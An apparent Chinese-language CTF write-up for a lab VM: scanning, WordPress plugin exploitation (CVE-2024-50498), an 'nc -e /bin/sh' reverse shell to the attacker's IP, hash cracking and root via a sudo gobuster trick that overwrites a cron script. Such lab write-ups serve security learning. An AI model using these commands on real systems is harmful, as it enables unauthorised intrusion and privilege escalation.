题目地址
信息收集
主机发现
┌──(root㉿kali)-[/home/kali]
└─# arp-scan -I eth1 192.168.56.0/24
Interface: eth1, type: EN10MB, MAC: 00:0c:29:34:da:f5, IPv4: 192.168.56.103
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0e (Unknown: locally administered)
192.168.56.100 08:00:27:b0:9b:6b (Unknown)
192.168.56.105 08:00:27:da:56:11 (Unknown)3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.157 seconds (118.68 hosts/sec). 3 responded
端口扫描
┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV 192.168.56.105
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-24 07:33 EST
Nmap scan report for 192.168.56.105
Host is up (0.00047s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u4 (protocol 2.0)
| ssh-hostkey:
| 2048 c2:91:d9:a5:f7:a3:98:1f:c1:4a:70:28:aa:ba:a4:10 (RSA)
| 256 3e:1f:c9:eb:c0:6f:24:06:fc:52:5f:2f:1b:35:33:ec (ECDSA)
|_ 256 ec:64:87:04:9a:4b:32:fe:2d:1f:9a:b0:81:d3:7c:cf (ED25519)
80/tcp open http nginx 1.14.2
|_http-title: bammmmuwe
|_http-generator: WordPress 6.7.1
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: nginx/1.14.2
MAC Address: 08:00:27:DA:56:11 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.44 seconds
80端口开了一个http服务。是一个用wordpress搭建的站点。
用wpscan
进行一些信息收集
最开始我只进行了wpscan --url http://192.168.56.105 -e u,ap
没用使用--plugins-detection aggressive
模式。
对目标进行了好几次的信息收集,但是没有收集到任何漏洞信息
后来使wpscan --url http://192.168.56.105 -e u,ap --plugins-detection aggressive
发现网站存在一个CVE-2024-50498
┌──(root㉿LAPTOP-40PQI58C)-[/mnt/c/Users/legion]
└─# wpscan --url http://192.168.56.105 -e u,ap --plugins-detection aggressive
_________________________________________________________________ _______ _____\ \ / / __ \ / ____|\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \\ /\ / | | ____) | (__| (_| | | | |\/ \/ |_| |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan TeamVersion 3.8.27Sponsored by Automattic - https://automattic.com/@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________[+] URL: http://192.168.56.105/ [192.168.56.105]
[+] Started: Mon Feb 24 20:36:52 2025Interesting Finding(s):[+] Headers| Interesting Entry: Server: nginx/1.14.2| Found By: Headers (Passive Detection)| Confidence: 100%[+] robots.txt found: http://192.168.56.105/robots.txt| Interesting Entries:| - /wp-admin/| - /wp-admin/admin-ajax.php| Found By: Robots Txt (Aggressive Detection)| Confidence: 100%[+] XML-RPC seems to be enabled: http://192.168.56.105/xmlrpc.php| Found By: Direct Access (Aggressive Detection)| Confidence: 100%| References:| - http://codex.wordpress.org/XML-RPC_Pingback_API| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/[+] WordPress readme found: http://192.168.56.105/readme.html| Found By: Direct Access (Aggressive Detection)| Confidence: 100%[+] The external WP-Cron seems to be enabled: http://192.168.56.105/wp-cron.php| Found By: Direct Access (Aggressive Detection)| Confidence: 60%| References:| - https://www.iplocation.net/defend-wordpress-from-ddos| - https://github.com/wpscanteam/wpscan/issues/1299[+] WordPress version 6.7.1 identified (Outdated, released on 2024-11-21).| Found By: Meta Generator (Passive Detection)| - http://192.168.56.105/, Match: 'WordPress 6.7.1'| Confirmed By: Rss Generator (Aggressive Detection)| - http://192.168.56.105/feed/, <generator>https://wordpress.org/?v=6.7.1</generator>| - http://192.168.56.105/comments/feed/, <generator>https://wordpress.org/?v=6.7.1</generator>[i] The main theme could not be detected.[+] Enumerating All Plugins (via Aggressive Methods)Checking Known Locations - Time: 00:14:12 <==================================> (109235 / 109235) 100.00% Time: 00:14:12
[+] Checking Plugin Versions (via Passive and Aggressive Methods)[i] Plugin(s) Identified:[+] akismet| Location: http://192.168.56.105/wp-content/plugins/akismet/| Last Updated: 2025-02-14T18:49:00.000Z| Readme: http://192.168.56.105/wp-content/plugins/akismet/readme.txt| [!] The version is out of date, the latest version is 5.3.7|| Found By: Known Locations (Aggressive Detection)| - http://192.168.56.105/wp-content/plugins/akismet/, status: 200|| Version: 5.3.5 (100% confidence)| Found By: Readme - Stable Tag (Aggressive Detection)| - http://192.168.56.105/wp-content/plugins/akismet/readme.txt| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)| - http://192.168.56.105/wp-content/plugins/akismet/readme.txt[+] feed| Location: http://192.168.56.105/wp-content/plugins/feed/|| Found By: Known Locations (Aggressive Detection)| - http://192.168.56.105/wp-content/plugins/feed/, status: 200|| The version could not be determined.[+] wp-query-console| Location: http://192.168.56.105/wp-content/plugins/wp-query-console/| Latest Version: 1.0 (up to date)| Last Updated: 2018-03-16T16:03:00.000Z| Readme: http://192.168.56.105/wp-content/plugins/wp-query-console/README.txt|| Found By: Known Locations (Aggressive Detection)| - http://192.168.56.105/wp-content/plugins/wp-query-console/, status: 403|| Version: 1.0 (80% confidence)| Found By: Readme - Stable Tag (Aggressive Detection)| - http://192.168.56.105/wp-content/plugins/wp-query-console/README.txt[+] Enumerating Users (via Passive and Aggressive Methods)Brute Forcing Author IDs - Time: 00:00:00 <==========================================> (10 / 10) 100.00% Time: 00:00:00[i] User(s) Identified:[+] ta0| Found By: Wp Json Api (Aggressive Detection)| - http://192.168.56.105/wp-json/wp/v2/users/?per_page=100&page=1| Confirmed By:| Rss Generator (Aggressive Detection)| Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Login Error Messages (Aggressive Detection)[+] welcome| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register[+] Finished: Mon Feb 24 20:51:12 2025
[+] Requests Done: 109276
[+] Cached Requests: 42
[+] Data Sent: 29.237 MB
[+] Data Received: 33.165 MB
[+] Memory used: 478.477 MB
[+] Elapsed time: 00:14:20
拿着payload直接打了,页面报错了
执行了phpinfo()
页面正常
但是执行其他语句就都是400
我执行了var_dump(1)
,虽然页面还是400 但是页面返回来了结果
在刚刚的返回的phpinfo()
页面看到了禁用的函数
但是用反引号还是能执行命令
弹个shellnc -e /bin/sh 192.168.56.103 7777
拿到了www-data
的权限
有一个叫welcome
的普通用户。同时WordPress也有一个welcome
的用户
上传一个php文件连接数据库读取出WordPress数据库中的用户与密码
刚看到这里的时候,脑子一抽。想着将加密的密码更新为已知的密码。
然后
突然间想起来 这里的welcome
的密码可能就是系统用户welcome
的密码
就拿了密码 用jhon去爆破
┌──(root㉿kali)-[/home/kali/Desktop/hackmyvm]
└─# john --show hash
?:1045671 password hash cracked, 0 left
然后通过ssh 顺利登录系统
┌──(root㉿kali)-[/home/kali/Desktop/hackmyvm]
└─# ssh welcome@192.168.56.105
Linux listen 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Feb 24 04:57:16 2025 from 192.168.56.103
$ whoami
welcome
sudo -l
看到/usr/bin/gobuster
不需要密码就可以使用sudo
$ sudo -l
Matching Defaults entries for welcome on listen:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser welcome may run the following commands on listen:(ALL) NOPASSWD: /usr/bin/gobuster
最开始是没有什么思路的
突然间想到可以将 /root/root.txt
文件指定为字典
在kali上用python -m http.server
起一个http服务
然后执行
sudo gobuster -u "http://192.168.56.101:8080" -w /root/root.txt
很不幸root's flag
的名字不叫root.txt
$ sudo gobuster -u "http://192.168.56.101:8080" -w /root/root.txt
2025/02/24 08:12:20 [!] 1 error occurred:* Wordlist (-w): File does not exist: /root/root.txt
下一个pspy看看
root
用户会定时执行/opt/.test.sh
这里突然间想到了
可以用python起一个htpp服务器然后在里面依次放入bin
chmod +s
bin
bash
文件夹以及文件
┌──(root㉿kali)-[/home/kali/Desktop/hackmyvm/empty]
└─# tree
.
└── bin└── chmod +s └── bin└── bash4 directories, 1 file
然后创建一个字典文件里面只写bin/chmod +s /bin/bash
$ cat 1
bin/chmod +s /bin/bash
然后执行sudo /usr/bin/gobuster -u http://192.168.56.103:8000/ -w /home/welcome/1 -o res
welcome@listen:~$ cat res
/bin/chmod +s /bin/bash (Status: 200)
welcome@listen:~$
得到的结果是我们想要的
但是多了一个 (Status: 200)
后来我才知道-n
参数可以忽略吊响应码
在命令后加一个-n
参数后
welcome@listen:~$ cat res
/bin/chmod +s /bin/bash
welcome@listen:~$
后面没任何东西了
刚好是我们想要的
接下来就是把他加入到/opt/.tets.sh
中
执行sudo /usr/bin/gobuster -u "http://192.168.56.103:8000/" -w /home/welcome/1 -o /opt/.test.sh -n
再看/bin/bash
的权限,已经加上了s
位
welcome@listen:~$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /bin/bash
welcome@listen:~$
之后执行 bash -p
就是root
权限了
welcome@listen:~$ bash -p
bash-5.0# whoami
root
bash-5.0# id
uid=1001(welcome) gid=1001(welcome) euid=0(root) egid=0(root) groups=0(root),1001(welcome)
bash-5.0#